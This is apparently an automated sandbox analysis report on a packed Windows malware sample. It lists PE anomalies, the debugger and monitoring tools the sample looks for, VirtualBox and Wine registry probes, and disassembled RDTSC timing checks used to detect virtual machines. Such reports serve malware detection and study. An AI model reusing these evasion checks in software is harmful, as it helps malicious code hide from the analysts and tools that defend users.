Unpacked PE file: 0.2.OoYYtngD7d.exe.470000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tflagfcm:EW;nhxcrbvn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tflagfcm:EW;nhxcrbvn:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: OoYYtngD7d.exe

Static PE information: real checksum: 0x446d27 should be: 0x44d9d7

Source: OoYYtngD7d.exe	Static PE information: section name:
Source: OoYYtngD7d.exe	Static PE information: section name: .idata
Source: OoYYtngD7d.exe	Static PE information: section name:
Source: OoYYtngD7d.exe	Static PE information: section name: tflagfcm
Source: OoYYtngD7d.exe	Static PE information: section name: nhxcrbvn
Source: OoYYtngD7d.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016A97F5 push eax; iretd	0_3_016A9845
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016B7C61 push eax; ret	0_3_016B7C69
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016B7C61 push eax; ret	0_3_016B7C69
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016B7C61 push eax; ret	0_3_016B7C69
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016B7C61 push eax; ret	0_3_016B7C69
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016BB42B push ebx; retf	0_3_016BB432
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016BB42B push ebx; retf	0_3_016BB432
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016BB42B push ebx; retf	0_3_016BB432
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016BB42B push ebx; retf	0_3_016BB432
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016BBDA9 push eax; iretd	0_3_016BBDB1
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016BBDA9 push eax; iretd	0_3_016BBDB1
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016BBDA9 push eax; iretd	0_3_016BBDB1
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016BBDA9 push eax; iretd	0_3_016BBDB1
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016B7C61 push eax; ret	0_3_016B7C69
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016B7C61 push eax; ret	0_3_016B7C69
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016B7C61 push eax; ret	0_3_016B7C69
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016B7C61 push eax; ret	0_3_016B7C69
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016BB42B push ebx; retf	0_3_016BB432
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016BB42B push ebx; retf	0_3_016BB432
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016BB42B push ebx; retf	0_3_016BB432
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016BB42B push ebx; retf	0_3_016BB432
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016BBDA9 push eax; iretd	0_3_016BBDB1
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016BBDA9 push eax; iretd	0_3_016BBDB1
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016BBDA9 push eax; iretd	0_3_016BBDB1
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016BBDA9 push eax; iretd	0_3_016BBDB1
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016B7C61 push eax; ret	0_3_016B7C69
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016B7C61 push eax; ret	0_3_016B7C69
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016B7C61 push eax; ret	0_3_016B7C69
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016B7C61 push eax; ret	0_3_016B7C69
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016BB42B push ebx; retf	0_3_016BB432
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016BB42B push ebx; retf	0_3_016BB432

Source: OoYYtngD7d.exe

Static PE information: section name: tflagfcm entropy: 7.955569694974701

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Window searched: window name: Regmonclass	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\OoYYtngD7d.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: OoYYtngD7d.exe, 00000000.00000003.2147343659.0000000007440000.00000004.00001000.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: PROCMON.EXE
Source: OoYYtngD7d.exe, 00000000.00000003.2147343659.0000000007440000.00000004.00001000.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: X64DBG.EXE
Source: OoYYtngD7d.exe, 00000000.00000003.2147343659.0000000007440000.00000004.00001000.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: WINDBG.EXE
Source: OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: OoYYtngD7d.exe, 00000000.00000003.2147343659.0000000007440000.00000004.00001000.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: B5259C second address: B525A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: B525A0 second address: B525AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: B525AB second address: B525B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: B525B8 second address: B51E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 nop 0x00000007 jmp 00007FDD79156832h 0x0000000c push dword ptr [ebp+122D06B1h] 0x00000012 cld 0x00000013 call dword ptr [ebp+122D1D60h] 0x00000019 pushad 0x0000001a or dword ptr [ebp+122D26A9h], ebx 0x00000020 xor eax, eax 0x00000022 mov dword ptr [ebp+122D193Eh], edi 0x00000028 mov edx, dword ptr [esp+28h] 0x0000002c jbe 00007FDD79156830h 0x00000032 jmp 00007FDD79156839h 0x00000037 mov dword ptr [ebp+122D3AA6h], eax 0x0000003d mov dword ptr [ebp+122D26A9h], esi 0x00000043 jmp 00007FDD79156833h 0x00000048 mov esi, 0000003Ch 0x0000004d jmp 00007FDD79156837h 0x00000052 add esi, dword ptr [esp+24h] 0x00000056 jp 00007FDD7915683Bh 0x0000005c lodsw 0x0000005e jmp 00007FDD79156833h 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 jno 00007FDD7915682Eh 0x0000006d mov ebx, dword ptr [esp+24h] 0x00000071 pushad 0x00000072 mov bh, 19h 0x00000074 pushad 0x00000075 mov dword ptr [ebp+122D2711h], edx 0x0000007b mov ecx, edx 0x0000007d popad 0x0000007e popad 0x0000007f nop 0x00000080 push eax 0x00000081 push edx 0x00000082 jmp 00007FDD79156830h 0x00000087 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCBF1D second address: CCBF23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCBF23 second address: CCBF43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDD79156836h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCBF43 second address: CCBF47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCC099 second address: CCC0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jc 00007FDD7915682Ch 0x0000000b jo 00007FDD79156826h 0x00000011 pop esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDD7915682Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCC0B8 second address: CCC0BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCC0BE second address: CCC0E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FDD79156837h 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCC35D second address: CCC361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCC361 second address: CCC36D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jng 00007FDD79156826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCC36D second address: CCC39C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007FDD78DE46A6h 0x00000009 jmp 00007FDD78DE46B0h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jo 00007FDD78DE46A8h 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e jo 00007FDD78DE46A6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCC39C second address: CCC3AE instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDD79156826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FDD79156844h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF4F8 second address: CCF4FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF4FE second address: CCF592 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDD79156826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov ecx, dword ptr [ebp+122D3CA2h] 0x00000013 push 00000000h 0x00000015 mov esi, dword ptr [ebp+122D2D09h] 0x0000001b push DA0884FFh 0x00000020 jnp 00007FDD7915682Eh 0x00000026 add dword ptr [esp], 25F77B81h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007FDD79156828h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 mov dword ptr [ebp+1244B32Dh], edx 0x0000004d push 00000003h 0x0000004f add dh, 00000035h 0x00000052 push 00000000h 0x00000054 call 00007FDD7915682Ch 0x00000059 mov edx, dword ptr [ebp+122D3CDEh] 0x0000005f pop esi 0x00000060 push 00000003h 0x00000062 jmp 00007FDD79156830h 0x00000067 push C9C3573Ah 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 push edx 0x00000071 pop edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF592 second address: CCF596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF596 second address: CCF59C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF59C second address: CCF5DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 09C3573Ah 0x00000010 jns 00007FDD78DE46AEh 0x00000016 jp 00007FDD78DE46A8h 0x0000001c lea ebx, dword ptr [ebp+12451372h] 0x00000022 mov esi, 4A3A3A0Ah 0x00000027 xchg eax, ebx 0x00000028 ja 00007FDD78DE46AAh 0x0000002e push eax 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF5DC second address: CCF5E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF5E0 second address: CCF5F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDD78DE46ADh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF6B4 second address: CCF6B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF6B8 second address: CCF6D1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FDD78DE46ACh 0x00000013 jno 00007FDD78DE46A6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF6D1 second address: CCF6D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF6D7 second address: CCF6EB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDD78DE46A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF6EB second address: CCF6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF6EF second address: CCF708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF708 second address: CCF71C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDD7915682Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF71C second address: CCF73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDD78DE46B3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF73C second address: CCF742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF742 second address: CCF746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF746 second address: CCF7C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push 00000003h 0x0000000b cld 0x0000000c push 00000000h 0x0000000e sub cl, FFFFFFB4h 0x00000011 push 00000003h 0x00000013 sub di, 3D11h 0x00000018 call 00007FDD79156829h 0x0000001d pushad 0x0000001e jmp 00007FDD79156835h 0x00000023 pushad 0x00000024 jns 00007FDD79156826h 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c popad 0x0000002d popad 0x0000002e push eax 0x0000002f pushad 0x00000030 pushad 0x00000031 pushad 0x00000032 popad 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 popad 0x00000036 push ebx 0x00000037 jg 00007FDD79156826h 0x0000003d pop ebx 0x0000003e popad 0x0000003f mov eax, dword ptr [esp+04h] 0x00000043 ja 00007FDD79156834h 0x00000049 mov eax, dword ptr [eax] 0x0000004b pushad 0x0000004c pushad 0x0000004d jmp 00007FDD7915682Ah 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF7C1 second address: CCF7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FDD78DE46A8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF7D8 second address: CCF7DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF7DC second address: CCF822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FDD78DE46A8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov edx, edi 0x00000024 lea ebx, dword ptr [ebp+1245137Bh] 0x0000002a sub si, ED12h 0x0000002f xchg eax, ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FDD78DE46AFh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF8B4 second address: CCF8B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF8B8 second address: CCF910 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FDD78DE46A8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 adc edi, 76F4D49Ch 0x00000028 push 00000000h 0x0000002a mov edx, edi 0x0000002c mov dword ptr [ebp+122D2701h], esi 0x00000032 push 03F76F07h 0x00000037 pushad 0x00000038 jmp 00007FDD78DE46B3h 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF910 second address: CCF97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD7915682Eh 0x00000009 popad 0x0000000a popad 0x0000000b xor dword ptr [esp], 03F76F87h 0x00000012 jo 00007FDD7915682Ah 0x00000018 mov cx, BD50h 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FDD79156828h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000019h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 mov edx, dword ptr [ebp+122D1AF0h] 0x0000003e mov dx, ax 0x00000041 push 00000000h 0x00000043 js 00007FDD7915682Ch 0x00000049 mov dword ptr [ebp+122D18F8h], edi 0x0000004f push 00000003h 0x00000051 mov si, F9B3h 0x00000055 push 80D51F85h 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CCF97F second address: CCF986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CAF2C6 second address: CAF2CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CED342 second address: CED378 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FDD78DE46B3h 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007FDD78DE46B3h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CED610 second address: CED614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CED778 second address: CED77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CED8CE second address: CED8DA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDD79156826h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CED8DA second address: CED8EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CED8EC second address: CED951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007FDD79156837h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FDD79156839h 0x00000014 popad 0x00000015 jmp 00007FDD79156837h 0x0000001a push edx 0x0000001b jmp 00007FDD79156830h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CEDE41 second address: CEDE52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46ACh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CEE231 second address: CEE254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jp 00007FDD79156826h 0x00000010 pop ebx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FDD7915682Fh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CEE3CE second address: CEE3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CEEC4D second address: CEEC51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
